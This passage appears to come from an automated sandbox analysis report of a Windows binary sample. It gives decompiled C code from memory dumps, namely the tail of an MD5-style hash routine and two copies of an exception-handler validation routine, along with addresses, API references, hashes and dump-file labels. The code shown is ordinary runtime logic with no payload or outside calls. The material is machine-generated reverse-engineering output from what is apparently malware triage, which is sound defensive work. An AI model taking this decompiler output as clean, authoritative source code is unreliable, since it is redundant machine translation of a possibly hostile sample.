				asm("rol edx, 0xe");
				_t421 = ( !_t721 & _t241 | _t362 & _t721) + _v64 + _t419 - 0xb2af279 + _t362;
				asm("ror esi, 0xc");
				_t723 = ( !_t241 & _t362 | _t421 & _t241) + _v44 + _t721 + 0x455a14ed + _t421;
				asm("rol eax, 0x5");
				_t243 = ( !_t362 & _t421 | _t362 & _t723) + _v24 + _t241 - 0x561c16fb + _t723;
				asm("rol ecx, 0x9");
				_t364 = ( !_t421 & _t723 | _t421 & _t243) + _v68 + _t362 - 0x3105c08 + _t243;
				asm("rol edx, 0xe");
				_t423 = ( !_t723 & _t243 | _t364 & _t723) + _v48 + _t421 + 0x676f02d9 + _t364;
				asm("ror esi, 0xc");
				_t725 = ( !_t243 & _t364 | _t423 & _t243) + _v28 + _t723 - 0x72d5b376 + _t423;
				asm("rol eax, 0x4");
				_t245 = (_t364 ^ _t423 ^ _t725) + _v56 + _t243 - 0x5c6be + _t725;
				asm("rol ecx, 0xb");
				_t366 = (_t423 ^ _t725 ^ _t245) + _v44 + _t364 - 0x788e097f + _t245;
				asm("rol edx, 0x10");
				_t425 = (_t366 ^ _t725 ^ _t245) + _v32 + _t423 + 0x6d9d6122 + _t366;
				_t598 = _t366 ^ _t425;
				asm("ror esi, 0x9");
				_t727 = (_t598 ^ _t245) + _v20 + _t725 - 0x21ac7f4 + _t425;
				asm("rol eax, 0x4");
				_t247 = (_t598 ^ _t727) + _v72 + _t245 - 0x5b4115bc + _t727;
				asm("rol edi, 0xb");
				_t606 = (_t425 ^ _t727 ^ _t247) + _v60 + _t366 + 0x4bdecfa9 + _t247;
				asm("rol edx, 0x10");
				_t427 = (_t606 ^ _t727 ^ _t247) + _v48 + _t425 - 0x944b4a0 + _t606;
				_t337 = _t606 ^ _t427;
				asm("ror ecx, 0x9");
				_t375 = (_t337 ^ _t247) + _v36 + _t727 - 0x41404390 + _t427;
				asm("rol eax, 0x4");
				_t249 = (_t337 ^ _t375) + _v24 + _t247 + 0x289b7ec6 + _t375;
				asm("rol esi, 0xb");
				_t733 = (_t427 ^ _t375 ^ _t249) + _v76 + _t606 - 0x155ed806 + _t249;
				asm("rol edi, 0x10");
				_t612 = (_t733 ^ _t375 ^ _t249) + _v64 + _t427 - 0x2b10cf7b + _t733;
				_t429 = _t733 ^ _t612;
				asm("ror ecx, 0x9");
				_t377 = (_t429 ^ _t249) + _v52 + _t375 + 0x4881d05 + _t612;
				asm("rol eax, 0x4");
				_t251 = (_t429 ^ _t377) + _v40 + _t249 - 0x262b2fc7 + _t377;
				asm("rol edx, 0xb");
				_t437 = (_t612 ^ _t377 ^ _t251) + _v28 + _t733 - 0x1924661b + _t251;
				asm("rol esi, 0x10");
				_t739 = (_t437 ^ _t377 ^ _t251) + _v16 + _t612 + 0x1fa27cf8 + _t437;
				asm("ror ecx, 0x9");
				_t379 = (_t437 ^ _t739 ^ _t251) + _v68 + _t377 - 0x3b53a99b + _t739;
				asm("rol eax, 0x6");
				_t253 = (( !_t437 | _t379) ^ _t739) + _v76 + _t251 - 0xbd6ddbc + _t379;
				asm("rol edx, 0xa");
				_t439 = (( !_t739 | _t253) ^ _t379) + _v48 + _t437 + 0x432aff97 + _t253;
				asm("rol esi, 0xf");
				_t741 = (( !_t379 | _t439) ^ _t253) + _v20 + _t739 - 0x546bdc59 + _t439;
				asm("ror ecx, 0xb");
				_t381 = (( !_t253 | _t741) ^ _t439) + _v56 + _t379 - 0x36c5fc7 + _t741;
				asm("rol eax, 0x6");
				_t255 = (( !_t439 | _t381) ^ _t741) + _v28 + _t253 + 0x655b59c3 + _t381;
				asm("rol edx, 0xa");
				_t441 = (( !_t741 | _t255) ^ _t381) + _v64 + _t439 - 0x70f3336e + _t255;
				asm("rol esi, 0xf");
				_t743 = (( !_t381 | _t441) ^ _t255) + _v36 + _t741 - 0x100b83 + _t441;
				asm("ror ecx, 0xb");
				_t383 = (( !_t255 | _t743) ^ _t441) + _v72 + _t381 - 0x7a7ba22f + _t743;
				asm("rol eax, 0x6");
				_t257 = (( !_t441 | _t383) ^ _t743) + _v44 + _t255 + 0x6fa87e4f + _t383;
				asm("rol edx, 0xa");
				_t443 = (( !_t743 | _t257) ^ _t383) + _v16 + _t441 - 0x1d31920 + _t257;
				asm("rol esi, 0xf");
				_t745 = (( !_t383 | _t443) ^ _t257) + _v52 + _t743 - 0x5cfebcec + _t443;
				asm("ror edi, 0xb");
				_t678 = (( !_t257 | _t745) ^ _t443) + _v24 + _t383 + 0x4e0811a1 + _t745;
				asm("rol eax, 0x6");
				_t259 = (( !_t443 | _t678) ^ _t745) + _v60 + _t257 - 0x8ac817e + _t678;
				asm("rol edx, 0xa");
				_t445 = (( !_t745 | _t259) ^ _t678) + _v32 + _t443 - 0x42c50dcb + _t259;
				_t399 = _a4;
				asm("rol esi, 0xf");
				_t747 = (( !_t678 | _t445) ^ _t259) + _v68 + _t745 + 0x2ad7d2bb + _t445;
				 *_t399 =  *_t399 + _t259;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t399 + 4)) = (( !_t259 | _t747) ^ _t445) + _v40 + _t678 - 0x14792c6f +  *((intOrPtr*)(_t399 + 4)) + _t747;
				 *((intOrPtr*)(_t399 + 8)) =  *((intOrPtr*)(_t399 + 8)) + _t747;
				 *((intOrPtr*)(_t399 + 0xc)) =  *((intOrPtr*)(_t399 + 0xc)) + _t445;
				return memset( &_v76, 0, 0x40);
			}

0x001c97f5
0x001c9800
0x001c9803
0x001c9806
0x001c9807
0x001c9807
0x001c9812
0x001c9823
0x001c9825
0x001c9828
0x001c9828
0x001c982b
0x001c982b
0x001c982e
0x001c982e
0x001c9831
0x001c9831
0x001c984e
0x001c9851
0x001c9867
0x001c986a
0x001c9884
0x001c9887
0x001c989d
0x001c98a0
0x001c98a2
0x001c98ba
0x001c98bd
0x001c98c0
0x001c98d8
0x001c98db
0x001c98f5
0x001c98f8
0x001c990e
0x001c9911
0x001c9913
0x001c992b
0x001c9930
0x001c9933
0x001c9949
0x001c994c
0x001c9966
0x001c9969
0x001c997f
0x001c9982
0x001c9984
0x001c999f
0x001c99a2
0x001c99b9
0x001c99bc
0x001c99c0
0x001c99d9
0x001c99dc
0x001c99de
0x001c99e1
0x001c99fc
0x001c99ff
0x001c9a18
0x001c9a1b
0x001c9a2b
0x001c9a2e
0x001c9a46
0x001c9a49
0x001c9a63
0x001c9a66
0x001c9a7e
0x001c9a81
0x001c9a97
0x001c9a9a
0x001c9ab2
0x001c9ab5
0x001c9acd
0x001c9ad0
0x001c9aea
0x001c9aed
0x001c9b03
0x001c9b06
0x001c9b1e
0x001c9b21
0x001c9b3b
0x001c9b3e
0x001c9b56
0x001c9b59
0x001c9b6f
0x001c9b72
0x001c9b8a
0x001c9b8d
0x001c9ba5
0x001c9ba8
0x001c9bba
0x001c9bbd
0x001c9bcf
0x001c9bd2
0x001c9be4
0x001c9be7
0x001c9beb
0x001c9bfb
0x001c9bfe
0x001c9c0c
0x001c9c0f
0x001c9c21
0x001c9c24
0x001c9c38
0x001c9c3b
0x001c9c3d
0x001c9c4d
0x001c9c50
0x001c9c62
0x001c9c65
0x001c9c73
0x001c9c76
0x001c9c88
0x001c9c8b
0x001c9c8f
0x001c9c9f
0x001c9ca2
0x001c9cb4
0x001c9cb7
0x001c9cc5
0x001c9cc8
0x001c9cda
0x001c9cdd
0x001c9cef
0x001c9cf2
0x001c9d06
0x001c9d09
0x001c9d1d
0x001c9d20
0x001c9d34
0x001c9d37
0x001c9d4b
0x001c9d4e
0x001c9d62
0x001c9d65
0x001c9d79
0x001c9d7e
0x001c9d90
0x001c9d93
0x001c9da7
0x001c9daa
0x001c9dbe
0x001c9dc1
0x001c9dd7
0x001c9dda
0x001c9dee
0x001c9df1
0x001c9e03
0x001c9e06
0x001c9e1a
0x001c9e1d
0x001c9e31
0x001c9e34
0x001c9e48
0x001c9e51
0x001c9e54
0x001c9e5d
0x001c9e66
0x001c9e6e
0x001c9e76
0x001c9e80
0x001c9e95

APIs

memset.NTDLL ref: 001C9E89

Memory Dump Source

Source File: 00000006.00000002.2504084087.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000006.00000002.2504076161.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504095624.00000000001CC000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.2504101151.00000000001CD000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504109228.00000000001CF000.00000002.00000001.sdmp Download File

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 52e03f73daf1acbc6a4f2a9c02c66ec997d616785c4cba18c714e75c778021e1
Instruction ID: f49fb7109f18720b11a7b3737ef4310f14e587f7f49cf5d7b0a0920e64afdb8c
Opcode Fuzzy Hash: 52e03f73daf1acbc6a4f2a9c02c66ec997d616785c4cba18c714e75c778021e1
Instruction Fuzzy Hash: 8922947BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0

Uniqueness

Uniqueness Score: -1.00%

Function 10002375, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10002375(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x10004178;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x100041c0 = 1;
										__eflags =  *0x100041c0;
										if( *0x100041c0 != 0) {
											goto L60;
										}
										_t84 =  *0x10004178;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x100041c0 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x10004178 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x10004180 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x1000417c + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x10004180 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x10004180 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x100041c0 = 1;
							__eflags =  *0x100041c0;
							if( *0x100041c0 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x10004180 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x10004180 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x100041c0 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x10004180 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x10004178 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x10004180 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x10004180 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x1000237f
0x10002382
0x10002388
0x100023a6
0x00000000
0x100023a6
0x10002390
0x10002399
0x1000239f
0x100023ae
0x100023b1
0x100023b4
0x100023be
0x100023be
0x100023c0
0x100023c3
0x100023c5
0x100023c5
0x100023c7
0x100023ca
0x00000000
0x00000000
0x100023cc
0x100023ce
0x10002434
0x10002434
0x10002592
0x00000000
0x10002592
0x100023d0
0x100023d0
0x100023d4
0x100023d6
0x100023d6
0x100023d6
0x100023d6
0x100023d9
0x100023da
0x100023dd
0x100023dd
0x100023e1
0x100023e5
0x100023f3
0x100023f3
0x100023fb
0x10002401
0x10002403
0x10002405
0x10002415
0x10002422
0x10002426
0x1000242b
0x1000242d
0x100024ab
0x100024ab
0x1000242f
0x1000242f
0x1000242f
0x100024ad
0x100024af
0x10002590
0x10002590
0x00000000
0x100024b5
0x100024b5
0x100024bc
0x00000000
0x00000000
0x100024c2
0x100024c6
0x10002522
0x10002524
0x1000252c
0x1000252e
0x10002530
0x00000000
0x00000000
0x10002532
0x10002538
0x1000253a
0x1000253c
0x10002551
0x10002551
0x10002553
0x10002582
0x10002589
0x00000000
0x10002589
0x10002557
0x10002558
0x1000255a
0x1000255c
0x1000255c
0x1000255e
0x10002560
0x10002562
0x10002576
0x10002576
0x10002579
0x1000257b
0x1000257b
0x1000257c
0x1000257c
0x00000000
0x10002564
0x10002564
0x10002564
0x1000256d
0x1000256e
0x10002570
0x10002572
0x10002572
0x00000000
0x10002564
0x10002562
0x1000253e
0x10002545
0x10002545
0x10002547
0x00000000
0x00000000
0x10002549
0x1000254a
0x1000254d
0x1000254f
0x00000000
0x00000000
0x00000000
0x1000254f
0x00000000
0x10002545
0x100024c8
0x100024cb
0x100024d0
0x00000000
0x00000000
0x100024d9
0x100024db
0x100024e1
0x00000000
0x00000000
0x100024e7
0x100024ed
0x00000000
0x00000000
0x100024f3
0x100024f5
0x100024fe
0x10002502
0x00000000
0x00000000
0x10002508
0x1000250b
0x1000250d
0x00000000
0x00000000
0x10002514
0x10002516
0x00000000
0x00000000
0x10002518
0x1000251c
0x00000000
0x00000000
0x00000000
0x1000251c
0x00000000
0x00000000
0x00000000
0x10002407
0x10002407
0x10002407
0x1000240e
0x00000000
0x00000000
0x10002410
0x10002411
0x10002413
0x00000000
0x00000000
0x00000000
0x10002413
0x1000243b
0x1000243d
0x00000000
0x00000000
0x1000244d
0x1000244f
0x10002451
0x00000000
0x00000000
0x10002457
0x1000245e
0x1000248a
0x1000248a
0x1000248c
0x1000248e
0x100024a2
0x100024a4
0x00000000
0x00000000
0x00000000
0x00000000
0x10002490
0x10002490
0x10002490
0x10002499
0x1000249a
0x1000249c
0x1000249e
0x1000249e
0x00000000
0x10002490
0x10002460
0x10002463
0x10002465
0x10002477
0x10002477
0x1000247a
0x1000247c
0x1000247c
0x1000247d
0x1000247d
0x10002483
0x00000000
0x00000000
0x00000000
0x00000000
0x10002467
0x10002467
0x10002467
0x1000246e
0x00000000
0x00000000
0x10002470
0x10002470
0x10002471
0x00000000
0x00000000
0x00000000
0x10002471
0x10002473
0x10002475
0x10002488
0x00000000
0x00000000
0x00000000
0x10002488
0x00000000
0x10002475
0x100023e7
0x100023ea
0x100023ed
0x00000000
0x00000000
0x100023ef
0x100023f1
0x00000000
0x00000000
0x00000000
0x100023f1
0x100023b6
0x100023b8
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL ref: 10002426

Memory Dump Source

Source File: 00000006.00000002.2505264344.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2505258135.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2505270801.0000000010005000.00000040.00020000.sdmp Download File

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: bc62919f775303453252f92297d23a638608a8d642d2c7d4ab03d1755088ac9f
Instruction ID: 0c254990f4eddd9df484f3b683da5194678d0c4feb8b8adbfe3d5bca3f7d4cb2
Opcode Fuzzy Hash: bc62919f775303453252f92297d23a638608a8d642d2c7d4ab03d1755088ac9f
Instruction Fuzzy Hash: 3861E170A00A52DFFB19CF28CCE065937E5EB893D5F628439D856C729DEB30DD828A54

Uniqueness

Uniqueness Score: -1.00%

Function 001CB341, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E001CB341(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x1cd2e0; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x1cd328 = 1;
										__eflags =  *0x1cd328;
										if( *0x1cd328 != 0) {
											goto L60;
										}
										_t84 =  *0x1cd2e0; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x1cd328 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x1cd2e0 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x1cd2e8 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x1cd2e4 + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x1cd2e8 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x1cd2e8 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x1cd328 = 1;
							__eflags =  *0x1cd328;
							if( *0x1cd328 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x1cd2e8 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x1cd2e8 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x1cd328 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x1cd2e8 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x1cd2e0 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x1cd2e8 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x1cd2e8 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x001cb34b
0x001cb34e
0x001cb354
0x001cb372
0x00000000
0x001cb372
0x001cb35c
0x001cb365
0x001cb36b
0x001cb37a
0x001cb37d
0x001cb380
0x001cb38a
0x001cb38a
0x001cb38c
0x001cb38f
0x001cb391
0x001cb391
0x001cb393
0x001cb396
0x00000000
0x00000000
0x001cb398
0x001cb39a
0x001cb400
0x001cb400
0x001cb55e
0x00000000
0x001cb55e
0x001cb39c
0x001cb39c
0x001cb3a0
0x001cb3a2
0x001cb3a2
0x001cb3a2
0x001cb3a2
0x001cb3a5
0x001cb3a6
0x001cb3a9
0x001cb3a9
0x001cb3ad
0x001cb3b1
0x001cb3bf
0x001cb3bf
0x001cb3c7
0x001cb3cd
0x001cb3cf
0x001cb3d1
0x001cb3e1
0x001cb3ee
0x001cb3f2
0x001cb3f7
0x001cb3f9
0x001cb477
0x001cb477
0x001cb3fb
0x001cb3fb
0x001cb3fb
0x001cb479
0x001cb47b
0x001cb55c
0x001cb55c
0x00000000
0x001cb481
0x001cb481
0x001cb488
0x00000000
0x00000000
0x001cb48e
0x001cb492
0x001cb4ee
0x001cb4f0
0x001cb4f8
0x001cb4fa
0x001cb4fc
0x00000000
0x00000000
0x001cb4fe
0x001cb504
0x001cb506
0x001cb508
0x001cb51d
0x001cb51d
0x001cb51f
0x001cb54e
0x001cb555
0x00000000
0x001cb555
0x001cb523
0x001cb524
0x001cb526
0x001cb528
0x001cb528
0x001cb52a
0x001cb52c
0x001cb52e
0x001cb542
0x001cb542
0x001cb545
0x001cb547
0x001cb547
0x001cb548
0x001cb548
0x00000000
0x001cb530
0x001cb530
0x001cb530
0x001cb539
0x001cb53a
0x001cb53c
0x001cb53e
0x001cb53e
0x00000000
0x001cb530
0x001cb52e
0x001cb50a
0x001cb511
0x001cb511
0x001cb513
0x00000000
0x00000000
0x001cb515
0x001cb516
0x001cb519
0x001cb51b
0x00000000
0x00000000
0x00000000
0x001cb51b
0x00000000
0x001cb511
0x001cb494
0x001cb497
0x001cb49c
0x00000000
0x00000000
0x001cb4a5
0x001cb4a7
0x001cb4ad
0x00000000
0x00000000
0x001cb4b3
0x001cb4b9
0x00000000
0x00000000
0x001cb4bf
0x001cb4c1
0x001cb4ca
0x001cb4ce
0x00000000
0x00000000
